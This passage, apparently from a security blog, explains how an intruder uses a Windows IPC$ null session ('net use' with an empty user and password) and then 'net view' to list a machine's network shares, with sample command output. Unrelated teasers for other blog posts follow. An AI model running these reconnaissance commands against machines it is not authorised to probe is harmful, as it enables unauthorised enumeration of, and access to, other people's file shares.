With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:
c:\>net view \\[ip address of remote machine]
Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):
C:\>net view \\0.0.0.0
System error 5 has occurred.
Access is denied.
C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.
C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0
Share name Type Used as Comment
---------------------------------------------------------------------
Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk
mirc Disk
NETLOGON Disk Logon server share
www_pages Disk
The command completed successfully.
As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.
Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.
Call phones from Gmail- Calls from PC to Phone with Google Talk ~~~~ Now in India ~~~~
Free International Calls from PC to Phone with Google Talk and Talkster (GTalk-to-VoIP) Google has officially unveiled its new Google Mai...
-
This post deals with a few useful Firefox Add-ons, which makes your Firefox more comfortable than before. Tiny Menu : If you are not using ...
-
Google has launched a contacts manager that users of services like Google Docs, Picasa, and Calendar can use, without having to be a Gmail u...